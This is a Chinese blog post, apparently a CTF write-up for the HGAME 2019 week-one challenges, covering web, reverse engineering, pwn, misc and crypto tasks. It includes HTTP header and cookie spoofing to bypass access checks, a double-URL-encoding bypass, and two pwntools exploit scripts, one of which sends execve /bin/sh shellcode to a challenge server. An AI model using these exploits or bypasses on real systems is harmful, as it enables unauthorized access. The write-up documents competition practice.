<!DOCTYPE html>
<html lang="zh-CN">





<head><meta name="generator" content="Hexo 3.9.0">
    <meta charset="UTF-8">
    <link rel="apple-touch-icon" sizes="76x76" href="/img/apple-touch-icon.png">
    <link rel="icon" type="image/png" href="/img/favicon.png">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
    <meta http-equiv="x-ua-compatible" content="ie=edge">
    <meta name="description" content="FzWjScJ">
    <meta name="author" content="FzWjScJ">
    <meta name="keywords" content="“在CTF上越变越菜的萌旧”">
    <title>Hgame--week1--菜鸡每天飞过 ~ 一个菜鸡的博客</title>
    <link rel="stylesheet" href="/lib/font-awesome/css/all.min.css?v=5.7.2">
    <link rel="stylesheet" href="/lib/mdbootstrap/css/bootstrap.min.css?v=4.3.1">
    <link rel="stylesheet" href="/lib/mdbootstrap/css/mdb.min.css?v=4.8.7">
    <link rel="stylesheet" href="/lib/github-markdown/github-markdown.min.css">
    <link rel="stylesheet" href="/lib/nprogress/nprogress.css?v=0.2.0">
    <link rel="stylesheet" href="//at.alicdn.com/t/font_1067060_qzomjdt8bmp.css">
    
        <link rel="stylesheet" href="/lib/prettify/tomorrow-night-eighties.min.css">
    
    <link rel="stylesheet" href="/css/main.css">

    
    <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js">
</script>

</head>


<body>
<header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
<div class="container">
    <a class="navbar-brand" href="/">&nbsp;<strong>一个菜鸡的博客</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent"
        aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
        <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
        <ul class="navbar-nav ml-auto text-center">
            
            <li class="nav-item">
                <a class="nav-link" href="/">Home</a>
            </li>
            
            <li class="nav-item">
                <a class="nav-link" href="/archives/">Archives</a>
            </li>
            
            <li class="nav-item">
                <a class="nav-link" href="/categories/">Categories</a>
            </li>
            
            <li class="nav-item">
                <a class="nav-link" href="/tags/">Tags</a>
            </li>
            
            <li class="nav-item">
                <a class="nav-link" href="/about/">About</a>
            </li>
            
            <li class="nav-item">
                <a class="nav-link" href="/friend/">Friend</a>
            </li>
            
        </ul>
    </div>
</div>


</nav>
    <div class="view intro-2"
         style="background: url('/img/post.jpg')no-repeat center center;background-size: cover;">
        <div class="full-bg-img">
            <div class="mask rgba-black-light flex-center">
                <div class="container text-center white-text wow fadeInUp">
                    <span class="h2" id="subtitle">
                        
                    </span>
                    
                        <br>
                        <p>星期四, 一月 31日 2019, 8:38 晚上</p>
                    
                </div>
            </div>
        </div>
    </div>
</header>

<main>
    
        

<div class="container-fluid">
    <div class="row">
        <div class="d-none d-lg-block col-lg-2"></div>
            <div class="col-lg-8 nopadding-md">
                <div class="py-5 z-depth-3 board">
                    <div class="post-content mx-auto">
                        <div class="markdown-body">
                            <p>HGAME WRITEUP WEEK1——FzWjScJ<br>WEB<br><font size="8">0x01</font>换头大作战<br>&emsp;&emsp;打开<a href="http://120.78.184.111:8080/week1/how/index.php" target="_blank" rel="noopener">题目</a>是一个输入界面和一个按钮（无视我的bilibili）</p>
<p><img src="https://i.imgur.com/lxMFbRw.png" alt></p>
<p>&emsp;&emsp;随便输了点啥进去提交看见</p>
<p><img src="https://i.imgur.com/ST0aLco.png" alt></p>
<p>&emsp;&emsp;GET和POST是HTTP请求的两种基本方法，既然说POST好一点那么就POST吧233</p>
<p>&emsp;&emsp;打开bp,发送POST请求</p>
<p><img src="https://i.imgur.com/OqvjONF.png" alt></p>
<p>&emsp;&emsp;看到下一步的hint，是使用localhost才可以进入下一步，使用就用X-Forwarded-For来伪造IP，在包里的内容在增加一个<code>X-Forwarded-For:127.0.0.1</code>再把cookie更改一下，把admin改成1，bp上go一波得到下一波hint</p>
<p><img src="https://i.imgur.com/Hnq80SQ.png" alt></p>
<p>&emsp;&emsp;看着这个是更改User_agent就把<code>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0</code>里的“Firefox/64.0”更改为“Waterfox/50.0”，然后再go一波</p>
<p><img src="https://i.imgur.com/OXZPAva.png" alt></p>
<p>&emsp;&emsp;最后是改HTTP协议里得referer，就把<code>Referer: http://120.78.184.111:8080/week1/how/index.php?want=123</code>改成b站（emmmmmmm）go一波，最后得到flag：hgame{hTTp_HeaDeR_iS_Ez}</p>
<p><img src="https://i.imgur.com/FNsoD1g.png" alt></p>
<hr>
<p><font size="8">0x02</font>very easy web<br>&emsp;&emsp;打开<a href="http://120.78.184.111:8080/week1/very_ez/index.php" target="_blank" rel="noopener">题目</a>,发现是一个PHP审计题目</p>
<p><img src="https://i.imgur.com/F9TIIDN.png" alt></p>
<p>&emsp;&emsp;看完代码应该是发出<code>？id=vidar</code>的请求，但是看着这个加密，百度了一下，是url二次编码漏洞，也就把第一个字符url编码两次就行了，编码后的请求是<code>？id=%2576idar</code>，得到flag：hgame{urlDecode_Is_GoOd}</p>
<p><img src="https://i.imgur.com/S4QBIcj.png" alt></p>
<hr>
<p><font size="8">0x03</font>can u find me?<br>&emsp;&emsp;打开<a href="http://47.107.252.171:8080/" target="_blank" rel="noopener">题目</a>,没有任何有用信息</p>
<p><img src="https://i.imgur.com/zTBpLZ7.png" alt></p>
<p>&emsp;&emsp;使用秘笈f12，看到一个f12.php的连接，点开</p>
<p><img src="https://i.imgur.com/yjEBVg3.png" alt><img src="https://i.imgur.com/889RiKJ.png" alt></p>
<p>&emsp;&emsp;找到一个提示，post密码过去，于是就打开bp抓了抓包，发现密码：<code>password: woyaoflag</code>，发送一个POST的请求</p>
<p><img src="https://i.imgur.com/Vn3b2HG.png" alt></p>
<p>&emsp;&emsp;得到一个连接，直接打开发现得不到flag……</p>
<p><img src="https://i.imgur.com/G3sTjQL.png" alt></p>
<p>&emsp;&emsp;然后打开bp，发现其实是有两个请求，第二个就跳转到上面那个界面，使用就只发送前面哪一个请求，就跳转到了flag那个界面，获得flag：hgame{f12_1s_aMazIng111}</p>
<p><img src="https://i.imgur.com/ixddVCL.png" alt></p>
<hr>
<p>RE</p>
<p><font size="8">0x01</font>brainfxxker<br>&emsp;&emsp;看题目应该就是brainfuck，下载题目是一个cpp文件，其实就是要把</p>
<p>,&gt;++++++++++[&lt;———-&gt;-]&lt;++[+.]</p>
<p>,&gt;+++++++++[&lt;———&gt;-]&lt;-[+.]</p>
<p>,&gt;+++++++[&lt;——-&gt;-]&lt;—[+.]</p>
<p>,&gt;++++++[&lt;——&gt;-]&lt;+++[+.]</p>
<p>,&gt;++++++++[&lt;———-&gt;-]&lt;++[+.]</p>
<p>,&gt;++++++++++[&lt;———-&gt;-]&lt;–[+.]</p>
<p>,&gt;++++++++++[&lt;——–&gt;-]&lt;—–[+.]</p>
<p>,&gt;++++++++++[&lt;———-&gt;-]&lt;+[+.]</p>
<p>,&gt;+++++++++[&lt;——–&gt;-]&lt;—[+.]</p>
<p>&emsp;&emsp;这一个brainfuck表达式在输入这9个字符后可以不输出东西，这九个字符就是Flag，然后看了一下brainfuck的基本语法</p>
<table>
<thead>
<tr>
<th>字符</th>
<th>含义</th>
</tr>
</thead>
<tbody><tr>
<td>,</td>
<td>输入内容到指针指向的单元（ASCⅡ码）</td>
</tr>
<tr>
<td>.</td>
<td>输出指针指向的单元内容（ASCⅡ码）</td>
</tr>
<tr>
<td>&gt;</td>
<td>指针加一</td>
</tr>
<tr>
<td>&lt;</td>
<td>指针减一</td>
</tr>
<tr>
<td>+</td>
<td>指针指向的字节的值加一</td>
</tr>
<tr>
<td>-</td>
<td>指针指向的字节的值减一</td>
</tr>
<tr>
<td>[</td>
<td>如果指针指向的单元值为零，向后跳转到对应的]指令的次一指令处</td>
</tr>
<tr>
<td>]</td>
<td>如果指针指向的单元值不为零，向前跳转到对应的[指令的次一指令处</td>
</tr>
</tbody></table>
<p>&emsp;&emsp;之后边开始查字符，</p>
<p>第一个的ascii当你输入10x10-2=98,对应下来就是b时不会输出；</p>
<p>第二个是9x9+1=82,也就是R；</p>
<p>第三个是7x7+3=52，是字符4；</p>
<p>第四个是6x6-3=33，是字符！；</p>
<p>第五个是8x10-2=78，是字符N；</p>
<p>第六个是10x10+2=102，是字符f；</p>
<p>第七个是10x8+5=85，是字符U；</p>
<p>第八个是10x10-1=99，是字符c；</p>
<p>最后一个是9x8+3=75，是字符K；</p>
<p>&emsp;&emsp;连在一起就是bR4!NfUcK,得到flag：hgame{bR4!NfUcK}</p>
<hr>
<p><font size="8">0x02</font>HelloRe<br>&emsp;&emsp;RE系列的签到题，下载文件后放到IDA里看看，然后调到main函数</p>
<p><img src="https://i.imgur.com/4yxY2og.png" alt></p>
<p>发现flag：hgame{Welc0m3_t0_R3_World!}</p>
<hr>
<p><font size="8">0x03</font>Pro的Python教室(一)<br>&emsp;&emsp;打开<a href="http://plqbnxx54.bkt.clouddn.com/first.py" target="_blank" rel="noopener">题目</a>是一段python程序</p>
<p><img src="https://i.imgur.com/yV4hSko.png" alt></p>
<p>&emsp;&emsp;然后读完程序以后发现只有第二段有一个base64加密（第三段假装加密hhhh），解密后拼起来得到flag：hgame{Here_1s_3asy_Pyth0n}</p>
<hr>
<p>PWN<br>&emsp;&emsp;题外话：对不起Aris的悉心教导下还是只做出来两道题……一定不放弃PWN<br><font size="8">0x01</font>babysc<br>&emsp;&emsp;题目丢进IDA里无法直接反汇编，所以在Aris教导下，找到无法反汇编那一段，把那一段的Hex改成90 90，汇编语言也就是nop，相当于把不能编译的那一段给删除掉然后再按F5反汇编，得到一个基本的逻辑伪代码</p>
<p><img src="https://i.imgur.com/scq9Q07.png" alt></p>
<p>&emsp;&emsp;我们可以看到之中有个加密，然后没有system，所以感觉是发送一个加密后的shellcode过去。下面是exp的代码（一开始想直接使用自带的shellcraft.sh()但是发现好像太长了，服务器那里程序会被跑崩掉，于是去网上抄了个其他的shellcode）：</p>
<pre><code>/usr/bin/python
-*-coding:utf-8-*-
from pwn import *
sh = remote(&apos;118.24.3.214&apos;,10000) 

shellcode = &quot;\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05&quot;
shellcode = list(shellcode)

for i in range(len(shellcode)):
    shellcode[i] = u8(shellcode[i])^(i+1)

for i in range(len(shellcode)):
    shellcode[i] = p8(shellcode[i])

shellcode=&quot;&quot;.join(shellcode)
sh.send(shellcode)
log.success(&quot;OK&quot;)</code></pre><p>&emsp;&emsp;再在虚拟机上跑一边，cat flag，得到flag：hgame{Baby_Baby_S0_E4ay!}<br><img src="https://i.imgur.com/TLGF3aM.png" alt></p>
<hr>
<p><font size="8">0x02</font>aaaaaaaaaa<br>&emsp;&emsp;PWN的签到题，直接用过量的’a’字符使栈覆盖System即可，以下是exp代码：</p>
<pre><code>/usr/bin/python
-*-coding:utf-8-*-
from pwn import *
sh = remote(&quot;118.24.3.214&quot;,9999)
junk = &apos;a&apos;*0x80
payload = junk
sh.send(payload)
sh.interactive()</code></pre><p>&emsp;&emsp;虚拟机上跑一遍，cat flag，得到flag：hgame{Aa4_4aA_4a4aAAA}<br><img src="https://i.imgur.com/CmwLlru.png" alt></p>
<hr>
<p><font size="8">0x03</font>薯片拯救世界1<br>&emsp;&emsp;这题没脚本跑出来=。=，可能真是我的打开方式不正确……但是有一个大概思路所以也就说下吧XD,<br>打开题目丢进IDA:</p>
<p><img src="https://i.imgur.com/fruS6V5.png" alt></p>
<p>可以看出就是要凑出来s1这个字符串，hint也说了是爆破，（但我爆破不出来……）</p>
<hr>
<p>MISC<br><font size="8">0x01</font>Hidden Image in LSB<br>&emsp;&emsp;开局一个压缩包，解压出一张图</p>
<p><img src="https://i.imgur.com/pZCHdBp.png" alt></p>
<p>（我渴望）然后审题，是LSB的图像隐写，oyeye本来想让我们写代码的，给了一个不完整的LSB的解密脚本，后面导出了stegsolve的神器，丢工具里，找到flag：hgame{LSB_is_easy_for_u}</p>
<p><img src="https://i.imgur.com/cX5IGuu.png" alt></p>
<hr>
<p><font size="8">0x02</font>打字机<br>&emsp;&emsp;Aris的打字机（给我也整一个.jpg)<br>开局直接给flag和打字机的图</p>
<p><img src="https://i.imgur.com/3kbWSMX.png" alt></p>
<p><img src="https://i.imgur.com/x6kkVTp.png" alt></p>
<p>&emsp;&emsp;然后就用Google识图（假装社工实际google）找到了一个对照的表，照着直接翻译</p>
<p><img src="https://i.imgur.com/R8kNava.png" alt></p>
<p><img src="https://i.imgur.com/EIDN9AZ.png" alt></p>
<p>&emsp;&emsp;翻译以后得到flag：hgame{My_vi0let_tyPewRiter}</p>
<hr>
<p><font size="8">0x03</font>Broken Chest<br>&emsp;&emsp;开局一个ZIP,直接丢Winhex</p>
<p><img src="https://i.imgur.com/rH4f10W.png" alt></p>
<p>发现ZIP头不对，改成504B,顺便发现了密码在最后面：<code>S0mETh1ng_U5efuL</code>,解压成功，得到flag：hgame{Cra2y_D1aM0nd}</p>
<p><img src="https://i.imgur.com/ZMnX2yi.png" alt></p>
<hr>
<p><font size="8">0x04</font>Try<br>&emsp;&emsp;下载下来是一个pacpng流量文件，用wireshark打开分析，直接导出一个dec.zip</p>
<p><img src="https://i.imgur.com/I8FpAkl.png" alt></p>
<p>&emsp;&emsp;打开两个文件，又一个压缩包还有一个password.txt，打开后是hgame<strong>****</strong>，用一个爆破zip的软件</p>
<p><img src="https://i.imgur.com/6Ttm29A.png" alt></p>
<p>&emsp;&emsp;用掩码爆破，得到密码：hgame25839421，解压后得到一个图片</p>
<p><img src="https://i.imgur.com/9utRnih.jpg" alt></p>
<p>（真好看）放到winhex看一看</p>
<p><img src="https://i.imgur.com/ziznhMw.png" alt></p>
<p>&emsp;&emsp;发现PK头，所以直接改后缀，改成zip后解压，发现解压不了，winrar修复一下，再解压，得到一个1.docx，打开发现没有东西（无字天书呼应233）然后用txt格式打开，又发现PK头，再改成zip，再解压</p>
<p><img src="https://i.imgur.com/IItlnMf.png" alt></p>
<p>&emsp;&emsp;发现是一堆xml界面，网上找了一个xml在线解析平台，找到document.xml，跑一下，得到flag：hgame{59d28413e36019861498e823f3f41406}</p>
<p><img src="https://i.imgur.com/Pzvhtap.png" alt></p>
<hr>
<p>CRYPTO<br><font size="8">0x01</font>Mix<br>&emsp;&emsp;看题目描述</p>
<p>–…/….-/….-/-…/–…/…–/…../..-./-…./-../-…./</p>
<p>..-./–…/—-./….-/….-/–…/.—-/-…./-…/–…/-…/</p>
<p>-…./..—/…../.—-/-…./-…./…–/….-/…–/—–/</p>
<p>-…./…../–…/-.. So easy</p>
<p>一看就是摩尔斯电码，在线平台解密，得到：744b735f6d6f7944716b7b6251663430657d，这个是16进制代码，</p>
<p>转成str后是tKs_moyDqk{bQf40e}，这是一个移位的加密，初步锁定再栅栏加密和凯撒密码，多次尝试后，</p>
<p>是先用密钥为2的栅栏加密，得到一个中间密码：tsmyq{Q4eK_oDkbf0}，</p>
<p>后面再用密钥为13的凯撒密码，得到flag：hgame{e4sy_crypt0}</p>
<hr>
<p><font size="8">0x02</font>Base全家<br>&emsp;&emsp;（不会写脚本手动解密emmmmm）打开后是一长段的txt，用hackbar来decode，base64解密3次后得到一大串数字，再来就是base16，转换三次，再base32解密一次，再用base16，后面又用base32解密，一次base64解密，一次base16，一次base64，四次base16，一次base32，一次base32，3次base64，俩次base58后得到flag：hgame{40ca78cde14458da697066eb4cc7daf6}</p>
<hr>
<p><font size="11">End</font></p>

                            <hr>
                        </div>
                        <br>
                        <div>
                            
                            <p>
                                <i class="iconfont icon-tag"></i>
                                
                                    <a class="hover-with-bg" href="/tags/HGAME">HGAME</a>
                                
                                    <a class="hover-with-bg" href="/tags/WEEK1">WEEK1</a>
                                
                            </p>
                            
                                <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a href="https://zh.wikipedia.org/wiki/Wikipedia:CC_BY-SA_3.0%E5%8D%8F%E8%AE%AE%E6%96%87%E6%9C%AC" rel="nofollow noopener">CC BY-SA 3.0协议</a> 。转载请注明出处！</p>
                            
                        </div>
                    </div>
                </div>
            </div>
        <div class="d-none d-lg-block col-lg-2 toc-container">
            
  <div id="toc">
    <p class="h4"><i class="far fa-list-alt"></i> Toc:</p> 
    <div id="tocbot"></div>
  </div>

        </div>
    </div>
</div>

<!-- custom -->


<!-- Comments -->
<div class="col-lg-7 mx-auto nopadding-md">
    <div class="container comments mx-auto" id="comments">
        
            <br><br>
            
            <div class="disqus" style="width:100%">
    <div id="disqus_thread"></div>
    <script>               
        var disqus_shortname = 'FzWjScJ# your shortname';
        var disqus_config = function () {
            this.page.url = 'http://fzwjscj.top/2019/01/31/hgame-week1/'; 
            this.page.identifier = '/2019/01/31/hgame-week1/';
        };
        (function() { 
            var d = document, s = d.createElement('script');
            s.type = 'text/javascript';
            s.src = '//'+disqus_shortname+'.disqus.com/embed.js';
            s.setAttribute('data-timestamp', +new Date());
            (d.head || d.body).appendChild(s);
        })();
    </script>
    <noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript" rel="nofollow noopener">comments powered by Disqus.</a></noscript>
</div>
        
    </div>
</div>
    
</main>

<footer class="mt-5">
  <div class="text-center py-3">
    <span id="busuanzi_container_site_uv">
     本站访客数<span id="busuanzi_value_site_uv"></span>人次
    </span>
    <br>
    
  </div>
</footer>

  <!-- SCRIPTS -->
  <script src="/lib/mdbootstrap/js/jquery-3.4.1.min.js"></script>
  <script src="/lib/mdbootstrap/js/popper.min.js"></script>
  <script src="/lib/mdbootstrap/js/bootstrap.min.js?v=4.3.1"></script>
  <script src="/lib/mdbootstrap/js/mdb.min.js?v=4.8.7"></script>
  <script src="/lib/nprogress/nprogress.min.js?v=0.2.0"></script>
  <script src="/js/main.js"></script>
  
    
      <script src="/lib/tocbot/tocbot.min.js?v=4.7.0"></script>
    
    <script src="/js/post.js"></script>
  
  
    <script src="/lib/prettify/prettify.min.js?v=0.1.0"></script>
    <script>
      $(document).ready(function(){
        $('pre').addClass('prettyprint linenums');
        prettyPrint();
      })
    </script>
  
  
    <script src="/lib/typed/typed.min.js?v=2.0.9"></script>
    <script>
        var typed = new Typed('#subtitle', {
          strings: [
            '  ',
            "Hgame--week1--菜鸡每天飞过&nbsp;",
        ],
        cursorChar: "_",
        typeSpeed: 70,
        startDelay: 300, //开始之前延迟300毫秒
        loop: false,
        });
        $(".typed-cursor").addClass("h2");
    </script>
  
  
    <script src="/lib/anchor/anchor.min.js?v=4.2.0"></script>
    <script>
      anchors.options = {
        placement: "right",
        visible: "false",
        
      };
      anchors.add(".post-content > h1,h2,h3,h4,h5,h6");
    </script>
  
</body>
</html>